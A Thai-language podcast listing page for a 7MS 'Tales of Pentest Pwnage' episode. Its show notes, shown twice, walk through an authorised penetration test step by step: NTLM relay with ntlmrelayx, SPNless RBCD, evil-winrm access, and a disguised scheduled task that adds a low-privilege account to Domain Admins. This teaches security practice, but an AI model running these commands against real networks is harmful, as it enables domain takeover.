Artwork

เนื้อหาจัดทำโดย Brian Johnson เนื้อหาพอดแคสต์ทั้งหมด รวมถึงตอน กราฟิก และคำอธิบายพอดแคสต์ได้รับการอัปโหลดและจัดหาให้โดยตรงจาก Brian Johnson หรือพันธมิตรแพลตฟอร์มพอดแคสต์ของพวกเขา หากคุณเชื่อว่ามีบุคคลอื่นใช้งานที่มีลิขสิทธิ์ของคุณโดยไม่ได้รับอนุญาต คุณสามารถปฏิบัติตามขั้นตอนที่แสดงไว้ที่นี่ https://th.player.fm/legal
Player FM - แอป Podcast
ออฟไลน์ด้วยแอป Player FM !

7MS #691: Tales of Pentest Pwnage – Part 75

31:39
 
แบ่งปัน
 

Manage episode 504658865 series 1288763
เนื้อหาจัดทำโดย Brian Johnson เนื้อหาพอดแคสต์ทั้งหมด รวมถึงตอน กราฟิก และคำอธิบายพอดแคสต์ได้รับการอัปโหลดและจัดหาให้โดยตรงจาก Brian Johnson หรือพันธมิตรแพลตฟอร์มพอดแคสต์ของพวกเขา หากคุณเชื่อว่ามีบุคคลอื่นใช้งานที่มีลิขสิทธิ์ของคุณโดยไม่ได้รับอนุญาต คุณสามารถปฏิบัติตามขั้นตอนที่แสดงไว้ที่นี่ https://th.player.fm/legal

Holy schnikes, today might be my favorite tale of pentest pwnage ever. Do I say that almost every episode? yes. Do I mean it? Yes. Here are all the commands/links to supplement today’s episode:

  • Got an SA account to a SQL server through Snaffler-ing
  • With that SA account, I learned how to coerce Web auth from within a SQL shell – read more about that here
  • I relayed that Web auth with ntlmrelayx -smb2support -t ldap://dc --delegate-access --escalate-user lowpriv
  • I didn’t have a machine account under my control, so I did SPNless RBCD on my lowpriv account – read more about that here
  • Using that technique, I requested a host service ticket for the SQL box, then used evil-winrm to remote in using the ticket
  • From there I checked out who had interactive logons: Get-Process -IncludeUserName explorer | Select-Object UserName
  • Then I queued up a fake task to elevate me to DA: schtasks /create /tn "TotallyFineTask" /tr 'net group "Domain Admins" lowpriv /add /domain' /sc once /st 12:00 /ru "DOMAIN\a-domain-admin" /it /f
  • …and ran it: schtasks /run /tn "TotallyFineTask"
  continue reading

500 ตอน

Artwork
iconแบ่งปัน
 
Manage episode 504658865 series 1288763
เนื้อหาจัดทำโดย Brian Johnson เนื้อหาพอดแคสต์ทั้งหมด รวมถึงตอน กราฟิก และคำอธิบายพอดแคสต์ได้รับการอัปโหลดและจัดหาให้โดยตรงจาก Brian Johnson หรือพันธมิตรแพลตฟอร์มพอดแคสต์ของพวกเขา หากคุณเชื่อว่ามีบุคคลอื่นใช้งานที่มีลิขสิทธิ์ของคุณโดยไม่ได้รับอนุญาต คุณสามารถปฏิบัติตามขั้นตอนที่แสดงไว้ที่นี่ https://th.player.fm/legal

Holy schnikes, today might be my favorite tale of pentest pwnage ever. Do I say that almost every episode? yes. Do I mean it? Yes. Here are all the commands/links to supplement today’s episode:

  • Got an SA account to a SQL server through Snaffler-ing
  • With that SA account, I learned how to coerce Web auth from within a SQL shell – read more about that here
  • I relayed that Web auth with ntlmrelayx -smb2support -t ldap://dc --delegate-access --escalate-user lowpriv
  • I didn’t have a machine account under my control, so I did SPNless RBCD on my lowpriv account – read more about that here
  • Using that technique, I requested a host service ticket for the SQL box, then used evil-winrm to remote in using the ticket
  • From there I checked out who had interactive logons: Get-Process -IncludeUserName explorer | Select-Object UserName
  • Then I queued up a fake task to elevate me to DA: schtasks /create /tn "TotallyFineTask" /tr 'net group "Domain Admins" lowpriv /add /domain' /sc once /st 12:00 /ru "DOMAIN\a-domain-admin" /it /f
  • …and ran it: schtasks /run /tn "TotallyFineTask"
  continue reading

500 ตอน

ทุกตอน

×
 
Loading …

ขอต้อนรับสู่ Player FM!

Player FM กำลังหาเว็บ

 

คู่มืออ้างอิงด่วน

ฟังรายการนี้ในขณะที่คุณสำรวจ
เล่น